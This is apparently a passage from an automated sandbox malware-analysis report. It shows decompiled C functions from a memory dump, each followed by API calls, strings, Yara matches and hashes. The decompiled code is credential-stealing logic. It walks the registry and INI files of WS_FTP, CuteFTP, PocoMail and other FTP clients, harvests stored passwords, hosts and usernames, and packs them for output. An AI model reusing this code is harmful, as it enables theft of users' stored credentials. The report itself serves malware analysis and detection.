                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t68;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCDA
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040DD0E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DEF7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                                        • API String ID: 1332880857-3620412361
                                                                        • Opcode ID: 35e9ed3ed1a003a67f34f22080199be6ed32246e6094e5c65f352b80361faa11
                                                                        • Instruction ID: c7e1c623c9d0911d9fb61fdd086df822930df8ad3d0878dbfe468f7a3020db9c
                                                                        • Opcode Fuzzy Hash: 35e9ed3ed1a003a67f34f22080199be6ed32246e6094e5c65f352b80361faa11
                                                                        • Instruction Fuzzy Hash: 2F51743194011CBADF226F91CC42BDD7AB6BF04304F1080BAB548751B1DF7A9AA5AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407D34(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				char _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				long _t63;
                                                                        				long _t64;
                                                                        
                                                                        				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t64 = _t63;
                                                                        				if(_t64 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t69);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "PassWord",  &_v2084);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "Url", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "RootDirectory", 0);
                                                                        						_v2092 = E00401C8E(_a8, _v2068, "Port", 0);
                                                                        						_v2096 = E00401C8E(_a8, _v2068, "ServerType", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2084);
                                                                        							E004014E8(_a4, _v2092);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2096);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2096);
                                                                        						E00407D34(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t64;
                                                                        			}


















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D47
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00407D7B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                                        • API String ID: 1332880857-2128033141
                                                                        • Opcode ID: 5d272c304e27db9f029665910115d696e7e15bd5ee73f67f691d4abd95bb4687
                                                                        • Instruction ID: 4eb3fcfc5343b041dd0bd68344c2513e02b84b383dc5ec38f59f6f48277349fc
                                                                        • Opcode Fuzzy Hash: 5d272c304e27db9f029665910115d696e7e15bd5ee73f67f691d4abd95bb4687
                                                                        • Instruction Fuzzy Hash: 6251723194011CBADF226F61CC42BED7AB6BF04304F14C0BAB558750B1DB7A5EA1AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404E40(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _t24;
                                                                        				void* _t25;
                                                                        				void* _t26;
                                                                        				long _t37;
                                                                        				long _t40;
                                                                        				void* _t47;
                                                                        				void* _t48;
                                                                        
                                                                        				_t48 = __edx;
                                                                        				_t47 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 3, 0);
                                                                        				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                        				if(_t24 != 0 && _t24 <= 0x104) {
                                                                        					_v276 = E00401D15( &_v269, "\\win.ini");
                                                                        					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
                                                                        					if(_t37 != 0) {
                                                                        						E00404C68(_t47, _a4,  &_v269, 0);
                                                                        					}
                                                                        					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
                                                                        					_t52 = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						E00404C68(_t47, _a4,  &_v269, 0);
                                                                        					}
                                                                        					E004017D5(_v276);
                                                                        				}
                                                                        				_t25 = E00401DCE(_t52, 0x2b); // executed
                                                                        				_t26 = _t25;
                                                                        				_t53 = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					E00404C68(_t47, _a4, E00401D69(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
                                                                        					E004017D5(_t31);
                                                                        				}
                                                                        				E00404DF4(_t47, _t53, _a4, 0x1a, "\\Ipswitch"); // executed
                                                                        				E00404DF4(_t47, _t53, _a4, 0x23, "\\Ipswitch"); // executed
                                                                        				E00404DF4(_t47, _t53, _a4, 0x1c, "\\Ipswitch"); // executed
                                                                        				return E00401553(_t48, _t53, _a4, _v8);
                                                                        			}














                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404E64
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004140DC,?,00000104,?), ref: 00404EB4
                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004140DC,?,00000104,?), ref: 00404EEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                                        • API String ID: 2508676433-45949541
                                                                        • Opcode ID: 8c32303686343bb50af495e6a366aa92cae66f3871f80159bea9ed8e1db5892c
                                                                        • Instruction ID: e00d4702d6b83cfd5b79c7bbcdca918ca21af511ae28e9f1c251b88d42575b58
                                                                        • Opcode Fuzzy Hash: 8c32303686343bb50af495e6a366aa92cae66f3871f80159bea9ed8e1db5892c
                                                                        • Instruction Fuzzy Hash: 452188B17902087ADF117AA1CC43FDA3A299F94744F1040777704B40E2EBFC9AC09A6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040EA6C(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				CHAR* _v2076;
                                                                        				long _t33;
                                                                        				CHAR* _t48;
                                                                        				long _t49;
                                                                        
                                                                        				_v2076 = E004017EC(0x105);
                                                                        				_t33 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				if(_t33 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t40);
                                                                        						_v2072 = E00401C8E(_a4, _v2068, "Path", 0);
                                                                        						__eflags = _v2072;
                                                                        						if(__eflags != 0) {
                                                                        							_t48 = E00401D15(_v2072, "\\PocoSystem.ini");
                                                                        							_push(_t48);
                                                                        							_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x4140dc, _v2076, 0x104, _t48);
                                                                        							__eflags = _t49 - 3;
                                                                        							if(_t49 > 3) {
                                                                        								E00404131(_a12, _v2076, "accounts.ini", 0xbeef0000);
                                                                        							}
                                                                        							E004017D5();
                                                                        						}
                                                                        						E0040EA6C(__eflags, _a4, _v2068, _a12);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				return E004017D5(_v2076);
                                                                        			}














                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA8F
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040EAC3
                                                                        • GetPrivateProfileStringA.KERNEL32(Program,DataPath,004140DC,?,00000104,00000000), ref: 0040EB49
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                                                        • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                                                        • API String ID: 1343824468-2495907966
                                                                        • Opcode ID: 4bc298418ff4aa406a7d4810b31869608f08b7aeec5db9d70fc2ff6b34816087
                                                                        • Instruction ID: 122af7354ceea1c80e976d98240d1f1ab236dc4a71dce6b0bb6b8652a25f0c4c
                                                                        • Opcode Fuzzy Hash: 4bc298418ff4aa406a7d4810b31869608f08b7aeec5db9d70fc2ff6b34816087
                                                                        • Instruction Fuzzy Hash: 29312D7194011CBADF11ABA2CC42FDD7AB9BF04304F1084B7B245751E1DAB95AE19F9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E004051B8(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t30;
                                                                        				void* _t37;
                                                                        				void* _t38;
                                                                        				char* _t39;
                                                                        
                                                                        				_t38 = __edx;
                                                                        				_t37 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 4, 0);
                                                                        				_t39 =  *0x414082; // 0x0
                                                                        				if( *_t39 == 0) {
                                                                        					L5:
                                                                        					E0040510F(_t37, _t43, _a4, 0x1a); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x23); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x1c); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x26); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
                                                                        					return E00401553(_t38, _t43, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t30 = StrStrIA(_t39, "CUTEFTP"); // executed
                                                                        					_t41 = _t30;
                                                                        					if(_t30 != 0) {
                                                                        						_t34 = E0040234A(_t41, _t39);
                                                                        						if(E0040234A(_t41, _t39) != 0) {
                                                                        							E00404FD8(_t37, _a4, _t34, "\\sm.dat");
                                                                        							E004017D5(_t34);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					_t37 = 0xffffffff;
                                                                        					asm("repne scasb");
                                                                        					_t43 =  *_t39;
                                                                        				} while ( *_t39 != 0);
                                                                        				goto L5;
                                                                        			}









                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,CUTEFTP), ref: 004051DF
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405270
                                                                        • \sm.dat, xrefs: 004051F3
                                                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405249
                                                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040527D
                                                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405263
                                                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 0040523C
                                                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405256
                                                                        • Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040528A
                                                                        • CUTEFTP, xrefs: 004051D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
                                                                        • API String ID: 1884169789-3073816274
                                                                        • Opcode ID: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
                                                                        • Instruction ID: c9e65f93459612828945218a38d798e19f240a3487c00c51deca1f9608bf85c0
                                                                        • Opcode Fuzzy Hash: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
                                                                        • Instruction Fuzzy Hash: D8215E706841097ACF117F21CD03F8E3E269F907A4F10413AB9197C0F2CBBD9A919A4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406229(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr* _v2092;
                                                                        				char _v2096;
                                                                        				char _v2100;
                                                                        				long _t57;
                                                                        				long _t58;
                                                                        				intOrPtr* _t72;
                                                                        
                                                                        				_t57 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "PW", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "PthR", 0);
                                                                        						_t72 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2096);
                                                                        						if(_t72 == 0 || _v2096 != 4) {
                                                                        							_t73 = _t72;
                                                                        							if(_t72 != 0) {
                                                                        								E004017D5(_t73);
                                                                        							}
                                                                        							_v2088 = 0x15;
                                                                        						} else {
                                                                        							 *_t23 =  *_t72;
                                                                        							E004017D5(_t72);
                                                                        						}
                                                                        						_v2092 = E00401C8E( *0x4140fe, _v2068, "SSH",  &_v2100);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							if(_v2092 == 0 || _v2100 != 4) {
                                                                        								E00401486(_a4, 0);
                                                                        							} else {
                                                                        								E00401486(_a4,  *_v2092);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t58;
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040623F
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406273
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406481
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Port$PthR$SSH$User
                                                                        • API String ID: 1332880857-1643752846
                                                                        • Opcode ID: 33638be76883ce77d589ccc560b81723aa9d63a9a6b4dfce219b775cf0549403
                                                                        • Instruction ID: dc339f5e81026a45414f470924930b9f0486a9fc6d38709ffe0ea3c9b7bda71c
                                                                        • Opcode Fuzzy Hash: 33638be76883ce77d589ccc560b81723aa9d63a9a6b4dfce219b775cf0549403
                                                                        • Instruction Fuzzy Hash: FA51E63194011CEADF216BA2CC42BDD7AB9BF08704F14C0BAB545750B1DB7A5EA19FD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405D78(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				char _v2092;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        				intOrPtr* _t64;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostAdrs", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "UserName", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "RemoteDir", 0);
                                                                        						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
                                                                        						if(_t64 == 0 || _v2092 != 4) {
                                                                        							_t65 = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								E004017D5(_t65);
                                                                        							}
                                                                        							_v2088 = 0x15;
                                                                        						} else {
                                                                        							 *_t23 =  *_t64;
                                                                        							E004017D5(_t64);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							E00401486(_a4, _v2088);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}


















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405D8E
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00405DC2
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F6E
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                                        • API String ID: 3369285772-3748300950
                                                                        • Opcode ID: 431c71695cd2a431547e5242a936ed43439a6d4ef0bb3b348d5cbf17716896b8
                                                                        • Instruction ID: 895065a577242a1dc8cf9cb542de238b46a37634af73f481449c44b05c989335
                                                                        • Opcode Fuzzy Hash: 431c71695cd2a431547e5242a936ed43439a6d4ef0bb3b348d5cbf17716896b8
                                                                        • Instruction Fuzzy Hash: E041F53194011DAADF216BA2CC42BDE7AB9FF04304F10C0BAB544751B1DB7A5E92AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004071D3(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t56;
                                                                        				long _t57;
                                                                        
                                                                        				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t57 = _t56;
                                                                        				if(_t57 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t62);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "FtpPassword", 0);
                                                                        						_v2084 = E00401C8E(_a8, _v2068, "_FtpPassword", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "FtpServer", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "FtpUserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "FtpDirectory", 0);
                                                                        						if(_v2080 != 0 || _v2084 != 0) {
                                                                        							if(_v2072 != 0 && _v2076 != 0) {
                                                                        								E00401486(_a4, 0xbeef0000);
                                                                        								E004014E8(_a4, _v2072);
                                                                        								E004014E8(_a4, _v2076);
                                                                        								E004014E8(_a4, _v2080);
                                                                        								E004014E8(_a4, _v2084);
                                                                        								E004014E8(_a4, _v2088);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004071D3(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t57;
                                                                        			}


                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071E6
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040721A
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                                        • API String ID: 1332880857-980612798
                                                                        • Opcode ID: f352eb7a3a3a567e6c51108ad8ada27e353cf21c43d5d0eec35ff94588182c15
                                                                        • Instruction ID: eb35d637fb60ff57c6ef9e79c42a55e3363b4def4f450bd9d6fd20052dedf9b6
                                                                        • Opcode Fuzzy Hash: f352eb7a3a3a567e6c51108ad8ada27e353cf21c43d5d0eec35ff94588182c15
                                                                        • Instruction Fuzzy Hash: 2E41C53194011CBADF226F51CC42BDC7BB6BF04304F10C0BAB958751B1DBBA5A92AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DA5F(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char* _v2092;
                                                                        				long _t57;
                                                                        				long _t58;
                                                                        
                                                                        				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
